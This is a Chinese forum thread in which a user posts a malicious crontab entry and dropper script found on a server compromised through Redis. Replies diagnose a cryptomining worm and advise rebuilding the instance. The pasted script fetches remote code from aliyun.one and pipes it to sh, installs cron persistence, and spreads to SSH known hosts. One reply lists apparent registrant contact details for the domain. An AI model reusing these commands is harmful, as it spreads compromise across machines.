这是一个创建于 2143 天前的主题,其中的信息可能已经有所发展或是发生改变。
crontab -l:
*/15 * * * * (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one)|sh
aliyun.one
export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin mkdir -p /tmp chmod 1777 /tmp echo "/10 * * * * (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c 'import urllib;print urllib.urlopen("http://aliyun.one").read()')|sh"|crontab - cat > /etc/crontab </dev/null 2>&1 &" & done fi for file in /home/ do if test -d $file; then if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then for h in $(grep -oE "\b([0-9]{1,3}.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oCOnnectTimeout=5 -oStrictHostKeyChecking=no $h "(curl -fsSL aliyun.one||wget -q -O- aliyun.one||python -c 'import urllib;print urllib.urlopen("http://aliyun.one").read()')|sh >/dev/null 2>&1 &" & done fi fi done #
大佬们解释一下。
 | 1 taolu 2019-11-29 16:18:31 +08:00 肉鸡复肉鸡 |
 | 2 hadoop 2019-11-29 16:21:32 +08:00 挖矿? |
 | 4 wangyzj 2019-11-29 16:31:12 +08:00 应该还有俩相关进程在活着吧 |
 | 8 mcfog 2019-11-29 16:34:54 +08:00  1 如果你不具备信息安全知识,那么这个时候应该做的是销毁这个实例,修改所有这个实例上曾经存在的密钥、密码、token 等信息,重新学习信息安全知识以后再重新开一个实例正确地配置服务,以免损失继续扩大 |
 | 9 eason1874 2019-11-29 16:35:30 +08:00 这么好的域名拿来干这个,可惜 |
 | 12 qsbaq 2019-11-29 16:51:43 +08:00 肉鸡变成肉鸡 |
 | 13 ppd OP @wangyzj 阿里云提示 “该文件极有可能是黑客成功入侵服务器植入的,建议您先根据恶意脚本的标签检查文件内容的合法性并处理” @taolu 果然是 redis 入侵导致的 进程异常行为-Linux 系统计划任务配置文件写入行为待处理 备注处理 该告警由如下引擎检测发现: 可疑文件路径:/var/spool/cron/temp-1391.rdb 进程路径:/usr/local/bin/redis-server 进程 PID:1391 事件说明:云盾检测到服务器的计划任务配置文件写入行为存在文件变动行为。如果该行为不是您自己主动运行,可能是黑客在尝试向服务器中注入自动计划任务用于持久化入侵,请及时检查告警中的目录文件中是否含有恶意代码。 |
 | 14 shmilypeter 2019-11-29 17:09:11 +08:00 备份好文件之后销毁实例,重装吧 |
| 15 ppd OP |
 | 16 realpg PRO 我猜你是 centos |
 | 17 Suvigotimor 2019-11-29 18:09:35 +08:00 我怀疑是 redis 无授权登录然后拿 root 之后设定的定时从远程代码托管网站获取肉鸡代码之后控制服务器的...这个好弄,找到它放文件的路径把源头删除了任务也删了,其他的清清重启就好了,redis 一定设置好授权。 |
 | 18 okwork 2019-11-29 18:25:59 +08:00 via Android 楼主在安全组里放行了外网的 6379 端口访问? |
 | 19 mink 2019-11-29 18:51:42 +08:00 之前我用 docker 拉了 redis 镜像, 也是被挖矿了。 |
| 20 mcfog 2019-11-29 18:54:39 +08:00 @ppd 销毁是因为你没有这个能力审计出对方到底做了什么事情留了哪些后门,销毁重建是这种情况下最经济的做法 即使你有信息安全能力,一样应当备份这个被攻击的镜像(离线研究)后销毁这个实例 |
 | 23 file0X0088 2019-11-29 19:08:15 +08:00 电话:+86.17006757575+86.013705182121 注册者:qiu gengmingChong Min She 注册机构:qiu gengmingSheChongMin 邮箱:[email protected]@qq.com |
| 24 file0X0088 2019-11-29 19:13:01 +08:00 这个人不太小心啊,信息都暴露了 |
 | 26 FS1P7dJz 2019-11-29 19:47:03 +08:00 @file0X0088 并不一定是真实信息 |
 | 27 opengps 2019-11-29 20:14:50 +08:00 via Android 这个是定向冒充阿里云的挖矿吧 |
 | 28 superrichman 2019-11-29 22:35:04 +08:00 这 cron job 想跟病毒一样到处传播。 话说这是第几个 redis 开放公网端口被入侵了的。 |
 | 29 anyforever 2019-11-30 19:53:44 +08:00 @opengps +1 |
 | 30 4cce1er 2019-12-01 14:17:52 +08:00 通过 redis 种木马有两个条件: 1. 空密码并且允许外部直接连接(bind 0.0.0.0) 2. redis 是 root 权限运行的 |
 | 31 vone 2019-12-05 17:29:36 +08:00 大数字是在哪里拦截的 360Netlab Sinkhole Project 这个页面是 360 网络安全研究院安全 DNS 项目的安全提示页面。 常见问题 Q: 这个页面是干什么的? 这个页面是 360 网络安全研究院( 360netlab )用来重定向不安全域名的页面,您访问到这个页面说明您访问的域名(aliyun.one)可能存在不安全行为。 不安全行为的域名类型包括但不限于僵尸网络的主控服务器域名,恶意程序的挖矿域名,钓鱼域名以及其他包含不安全行为的黑灰域名等等。 Q: 我是怎么到这个页面的? 您使用了 360 公司的安全 DNS 服务之后,安全 DNS 会自动对您请求的域名是否安全进行判定,如果域名被判定为不安全就会跳转到这个页面。 Q: 你们错误拦截了合法域名,怎么解封? 360 安全 DNS 仅拦截对用户有不安全行为的域名,在保证用户的上网体验的同时,提高用户上网的安全性。 阻断的域名列表是 360netlab 利用多种技术手段自动化生成的,并不会基于网站具体内容决定是否拦截。 如果您是域名的所有者并确定自己的域名没有不安全行为,请点击此处发送邮件到 sinkhole#360.cn(发邮件之前,请把#替换为 @) ,请在邮件中简要说明域名的功能和用途,并注意确保邮件中标明你要解封的域名 关于 360 网络安全研究院( 360netlab ) 欢迎访问我们的网站 360 网络安全研究院( 360netlab )。 感谢您使用 360 安全 DNS 服务。 |
 | 32 lifespy 2019-12-06 14:52:39 +08:00 前几天我就发现了。然后我还在隔壁论坛发了个帖子 |
Select Language